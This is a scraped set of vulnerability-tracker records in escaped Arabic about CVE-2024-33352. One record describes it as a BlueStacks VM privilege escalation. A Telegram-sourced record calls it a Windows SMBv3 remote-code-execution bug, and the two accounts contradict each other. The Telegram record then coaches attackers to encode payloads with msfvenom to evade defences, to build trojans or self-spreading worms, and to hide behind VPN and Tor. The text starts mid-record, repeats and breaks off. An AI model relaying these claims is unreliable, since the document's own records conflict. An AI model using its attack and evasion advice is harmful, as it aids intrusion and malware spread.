\u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062d\u0627\u0643\u064a \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n\n\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\nCVE-2024-33352 \u0647\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a BlueStacks\u060c \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation) \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring). \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0633\u0645\u0648\u062d \u0644\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629.\n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u061f\n\n1. \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring):\n - \u062a\u0633\u062a\u062e\u062f\u0645 BlueStacks \u062a\u0642\u0646\u064a\u0629 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0638\u0627\u0645 \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 (malicious code) \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n \n2. \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation):\n - \u0628\u0639\u062f \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631\u060c \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u062f\u0627\u062e\u0644 \u0627\u0644\u0646\u0638\u0627\u0645. \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u062b\u0644 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 (Administrator privileges)\u060c \u0645\u0645\u0627 \u064a\u062a\u064a\u062d \u0644\u0647 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629.\n\n\u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u064a:\n\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0644\u062f\u064a\u0647 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631 \u0627\u0644\u0630\u064a \u064a\u0639\u0645\u0644 \u0639\u0644\u064a\u0647 BlueStacks. \u064a\u0645\u0643\u0646\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0628\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n - \u064a\u0642\u0648\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0640 BlueStacks. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0636\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b.\n\n2. \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n - \u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 BlueStacks\u060c \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.", "creation_timestamp": "2024-12-13T19:00:22.000000Z"} https://vulnerability.circl.lu/sighting/8454b4dd-4ecc-4d1a-8559-383b31fe5e09/export Fri, 13 Dec 2024 19:00:22 +0000 https://vulnerability.circl.lu/sighting/2d520f7b-8c6c-4312-a64a-5f06aabd0211/export {"uuid": "2d520f7b-8c6c-4312-a64a-5f06aabd0211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3542", "content": "CVE-2024-33352 \u0647\u0648 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u064a \u0628\u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u0643\u0644 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0632\u064a Windows \u0648\u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641. \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0647\u064a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0625\u0631\u0633\u0627\u0644 \u062d\u0632\u0645 \u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u062a\u0645 \u062a\u0643\u0648\u064a\u0646\u0647\u0627 \u0628\u0634\u0643\u0644 \u062e\u0627\u0635 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0627\u0644\u0644\u064a \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMB \u0648\u0628\u064a\u0643\u0648\u0646 \u0627\u0644\u0647\u062f\u0641 \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0635\u062d\u064a\u062d\u0629 \u0648\u064a\u0628\u062f\u0623 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629.\n\n\u0639\u0644\u0634\u0627\u0646 \u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0647\u062c\u0648\u0645 \u0623\u0648 \u062a\u0636\u064a\u0641\u0647\u0627 \u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631\u060c \u0623\u0648\u0644 \u062d\u0627\u062c\u0629 \u0644\u0627\u0632\u0645 \u062a\u0639\u0645\u0644\u0647\u0627 \u0647\u064a \u0625\u0646\u0643 \u062a\u062c\u0647\u0632 \u062d\u0632\u0645 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062f\u064a \u0628\u062a\u0643\u0648\u0646 \u0639\u0628\u0627\u0631\u0629 \u0639\u0646 \u0633\u0644\u0633\u0644\u0629 \u0645\u0646 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0648\u0627\u0644\u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0627\u0644\u0644\u064a \u0628\u062a\u062a\u0648\u0627\u0641\u0642 \u0645\u0639 \u0627\u0644\u0634\u0631\u0648\u0637 \u0627\u0644\u0645\u062d\u062f\u062f\u0629 \u0644\u0644\u062b\u063a\u0631\u0629 \u0644\u0627\u0632\u0645 \u062a\u062a\u0623\u0643\u062f \u0625\u0646 \u0627\u0644\u062d\u0632\u0645 \u062f\u064a \u0645\u0635\u0645\u0645\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u064a\u0642\u0631\u0623\u0647\u0627 \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0633\u0644\u064a\u0645\u0629 \u0641\u064a \u0627\u0644\u0628\u062f\u0627\u064a\u0629 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0644\u064a \u0641\u064a\u0647\u0627 \u0641\u064a \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u062f\u064a \u0647\u0646\u0648\u0636\u062d \u0625\u0632\u0627\u064a \u062a\u0642\u062f\u0631 \u062a\u0646\u0641\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0639\u0644\u0645\u064a \u0648\u062f\u0642\u064a\u0642.\n\n\u0623\u0648\u0644\u0627\u064b\u060c \u0647\u062a\u0628\u062f\u0623 \u0628\u062a\u062d\u0644\u064a\u0644 \u0643\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0645\u0648\u062c\u0648\u062f \u0639\u0644\u0649 GitHub \u0648\u062a\u0641\u0647\u0645 \u0643\u0648\u064a\u0633 \u0625\u0632\u0627\u064a \u0628\u064a\u0634\u062a\u063a\u0644 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062e\u0627\u0635 \u0628\u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u062d\u0632\u0645 \u0648\u0647\u0646\u0627 \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0632\u064a Wireshark \u0639\u0644\u0634\u0627\u0646 \u062a\u0631\u0627\u0642\u0628 \u062d\u0631\u0643\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0648\u062a\u0641\u0647\u0645 \u0625\u0632\u0627\u064a \u0627\u0644\u062d\u0632\u0645 \u0628\u062a\u062a\u0628\u0627\u062f\u0644 \u0628\u064a\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0648\u0627\u0644\u0633\u064a\u0631\u0641\u0631 \u0648\u062f\u0647 \u0647\u064a\u0633\u0627\u0639\u062f\u0643 \u062a\u0643\u062a\u0634\u0641 \u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644. \u0628\u0639\u062f \u0643\u062f\u0647 \u0647\u062a\u0628\u062f\u0623 \u0641\u064a \u0625\u0639\u062f\u0627\u062f \u0643\u0648\u062f \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u062e\u0627\u0635 \u0628\u064a\u0643 \u0639\u0644\u0634\u0627\u0646 \u062a\u0628\u0639\u062a \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0644\u0644\u0633\u064a\u0631\u0641\u0631 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u062f\u0647 \u0645\u0645\u0643\u0646 \u062a\u0639\u0645\u0644\u0647 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0644\u063a\u0627\u062a \u0628\u0631\u0645\u062c\u0629 \u0632\u064a Python \u0623\u0648 C++ \u0648\u062f\u064a \u0644\u063a\u0627\u062a \u0642\u0648\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0643\u062a\u0628 \u0628\u064a\u0647\u0627 \u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0646\u0641\u0630 \u0623\u0648\u0627\u0645\u0631 \u0645\u0639\u0642\u062f\u0629.\n\n\u062b\u0627\u0646\u064a\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u062e\u062a\u0627\u0631 \u0627\u0644\u0647\u062f\u0641 \u0628\u062a\u0627\u0639\u0643 \u0628\u0639\u0646\u0627\u064a\u0629 \u0648\u062f\u0647 \u0628\u064a\u0643\u0648\u0646 \u0633\u064a\u0631\u0641\u0631 \u0628\u064a\u0634\u063a\u0644 \u062e\u062f\u0645\u0629 SMBv3 \u0648\u0639\u0644\u064a\u0647 \u0646\u0638\u0627\u0645 \u062a\u0634\u063a\u064a\u0644 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0625\u0646\u0643 \u062a\u0643\u0648\u0646 \u0645\u062c\u0647\u0632 \u0628\u064a\u0626\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0622\u0645\u0646\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u062c\u0631\u0628 \u0639\u0644\u064a\u0647\u0627 \u0627\u0644\u0647\u062c\u0648\u0645 \u0642\u0628\u0644 \u0645\u0627 \u062a\u0646\u0641\u0630\u0647 \u0641\u064a \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629 \u0648\u062a\u0642\u062f\u0631 \u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Metasploit Framework \u0639\u0644\u0634\u0627\u0646 \u062a\u062e\u062a\u0628\u0631 \u0627\u0644\u062b\u063a\u0631\u0629 \u0648\u062a\u0639\u062f\u0644 \u0639\u0644\u0649 \u0627\u0644\u0623\u0643\u0648\u0627\u062f \u0628\u062a\u0627\u0639\u062a\u0643 \u0648\u062a\u062a\u0627\u0643\u062f \u0625\u0646\u0647\u0627 \u0628\u062a\u0634\u062a\u063a\u0644 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d.\n\n\u062b\u0627\u0644\u062b\u0627\u064b\u060c \u0644\u0627\u0632\u0645 \u062a\u0636\u064a\u0641 \u0628\u0639\u0636 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0625\u0636\u0627\u0641\u064a\u0629 \u0644\u062a\u062d\u0633\u064a\u0646 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0648\u062f\u0647 \u0628\u064a\u0634\u0645\u0644 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0637\u0631\u064a\u0642\u0629 \u062a\u062e\u0644\u064a \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0623\u0635\u0639\u0628 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0648\u0627\u062a \u0632\u064a Msfvenom \u0645\u0645\u0643\u0646 \u062a\u0636\u064a\u0641 \u0623\u0643\u0648\u0627\u062f \u062a\u0634\u0641\u064a\u0631 \u0644\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0634\u0627\u0646 \u062a\u0639\u062f\u064a \u0645\u0646 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062d\u0645\u0627\u064a\u0629.\n\n\u0645\u0646 \u0636\u0645\u0646 \u0627\u0644\u062a\u062d\u0633\u064a\u0646\u0627\u062a \u0627\u0644\u0645\u0645\u0643\u0646\u0629 \u0647\u064a \u0625\u0646\u0643 \u062a\u062f\u0645\u062c \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0623\u0643\u0628\u0631 \u064a\u0639\u0646\u064a \u0645\u062b\u0644\u0627\u064b \u062a\u0642\u062f\u0631 \u062a\u0639\u0645\u0644 \u062d\u0635\u0627\u0646 \u0637\u0631\u0648\u0627\u062f\u0629 (Trojan Horse) \u0628\u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0639\u0644\u0634\u0627\u0646 \u064a\u062f\u062e\u0644 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0648\u0628\u0639\u062f \u0643\u062f\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u062e\u0628\u064a\u062b\u0629 \u0632\u064a \u0633\u0631\u0642\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0623\u0648 \u062a\u062f\u0645\u064a\u0631 \u0645\u0644\u0641\u0627\u062a \u0623\u0648 \u062d\u062a\u0649 \u062a\u062d\u0645\u064a\u0644 \u0645\u0627\u0644\u0648\u064a\u0631 \u0625\u0636\u0627\u0641\u064a. \u0648\u0623\u062e\u064a\u0631\u0627\u064b \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u062d\u0631\u064a\u0635 \u062c\u062f\u0627\u064b \u0648\u062a\u0627\u062e\u062f \u0643\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u0627\u062a\u0643 \u0639\u0644\u0634\u0627\u0646 \u0645\u062a\u062a\u0639\u0631\u0636\u0634 \u0644\u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u0648 \u0627\u0644\u062a\u0639\u0642\u0628 \u064a\u0639\u0646\u064a \u0644\u0627\u0632\u0645 \u062a\u0633\u062a\u062e\u062f\u0645 \u0634\u0628\u0643\u0629 \u0648\u0647\u0645\u064a\u0629 (VPN) \u0648\u062a\u063a\u064a\u0631 \u0645\u0648\u0642\u0639\u0643 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0633\u062a\u062e\u062f\u0645 \u0623\u062f\u0648\u0627\u062a \u0625\u062e\u0641\u0627\u0621 \u0627\u0644\u0647\u0648\u064a\u0629 \u0632\u064a Tor.\n\n\u0644\u0627\u0632\u0645 \u062a\u0639\u0631\u0641 \u0625\u0646 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u062e\u0637\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0648\u0644\u0648 \u062a\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627 \u0628\u0634\u0643\u0644 \u0635\u062d\u064a\u062d \u0645\u0645\u0643\u0646 \u062a\u0633\u0628\u0628 \u0623\u0636\u0631\u0627\u0631 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0644\u0623\u064a \u0646\u0638\u0627\u0645 \u0639\u0644\u0634\u0627\u0646 \u0643\u062f\u0647 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0628\u062a\u0646\u0635\u062d \u0628\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0628\u0627\u0633\u062a\u0645\u0631\u0627\u0631 \u0648\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0628\u0627\u062a\u0634\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0646\u0632\u0644\u0647\u0627 \u0627\u0644\u0634\u0631\u0643\u0627\u062a \u0639\u0644\u0634\u0627\u0646 \u062a\u0642\u0641\u0644 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u062f\u064a \u0648\u0643\u0645\u0627\u0646 \u0644\u0627\u0632\u0645 \u062a\u0643\u0648\u0646 \u0639\u0644\u0649 \u062f\u0631\u0627\u064a\u0629 \u062a\u0627\u0645\u0629 \u0628\u0643\u0644 \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u0644\u064a \u0628\u062a\u0637\u0628\u0642\u0647\u0627 \u0639\u0644\u0634\u0627\u0646 \u062a\u062d\u0645\u064a \u0646\u0641\u0633\u0643 \u0648\u0623\u062c\u0647\u0632\u062a\u0643 \u0645\u0646 \u0623\u064a \u0647\u062c\u0648\u0645 \u0645\u0645\u0643\u0646.\n\n\u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0628\u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u0645\u0645\u0643\u0646 \u064a\u0633\u062a\u062e\u062f\u0645\u0647\u0627 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 \u0647\u062c\u0645\u0627\u062a \u0645\u062a\u0646\u0648\u0639\u0629 \u0632\u064a \u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0634\u0628\u0643\u0627\u062a \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0623\u0648 \u062d\u062a\u0649 \u062a\u0648\u062c\u064a\u0647 \u0647\u062c\u0645\u0627\u062a DDoS \u0628\u0634\u0643\u0644 \u0641\u0639\u0627\u0644 \u062c\u062f\u0627\u064b. \u0648\u0644\u0648 \u0643\u0646\u062a \u0639\u0627\u0648\u0632 \u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062b\u063a\u0631\u0629 \u062f\u064a \u0641\u064a \u0645\u0627\u0644\u0648\u064a\u0631 \u0645\u0645\u0643\u0646 \u062a\u062f\u0645\u062c\u0647\u0627 \u0641\u064a \u0628\u0631\u0646\u0627\u0645\u062c \u062e\u0628\u064a\u062b \u064a\u0642\u0648\u0645 \u0628\u0646\u0634\u0631 \u0646\u0641\u0633\u0647 \u0639\u0628\u0631 \u0627\u0644\u0634\u0628\u0643\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u0647 \u0647\u064a\u062e\u0644\u064a \u0627\u0644\u0645\u0627\u0644\u0648\u064a\u0631 \u064a\u0646\u062a\u0634\u0631 \u0628\u0633\u0631\u0639\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b \u0628\u064a\u0646 \u0627\u0644\u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0644\u064a \u0634\u063a\u0627\u0644\u0629 \u0639\u0644\u0649 \u0646\u0641\u0633 \u0627\u0644\u0634\u0628\u0643\u0629 \u0648\u0628\u0627\u0644\u062a\u0627\u0644\u064a \u062a\u0632\u0648\u062f \u0641\u0631\u0635 \u0646\u062c\u0627\u062d \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0634\u0643\u0644 \u0643\u0628\u064a\u0631.", "creation_timestamp": "2025-03-21T12:03:59.000000Z"} {"uuid": "2d520f7b-8c6c-4312-a64a-5f06aabd0211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3542", "content": "CVE-2024-33352 \u0647\u0648 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 SMBv3 \u0648\u062f\u064a \u0628\u062a\u0623\u062b\u0631 \u0639\u0644\u0649 \u0643\u0644 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0644\u064a \u0628\u062a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0628\u0631\u0648\u062a\u0648\u0643\u0648\u0644 \u062f\u0647 \u0632\u064a Windows \u0648\u0628\u062a\u0633\u0645\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0625\u0646\u0647 \u064a\u0646\u0641\u0630 \u062a\u0639\u0644\u064a\u0645\u0627\u062a \u0628\u0631\u0645\u062c\u064a\u0629 \u0639\u0646 \u0628\u064f\u0639\u062f \u0648\u064a\u0633\u064a\u0637\u0631 \u0639\u0644\u0649 \u0627\u0644\u0646\u0638\u0627\u0645 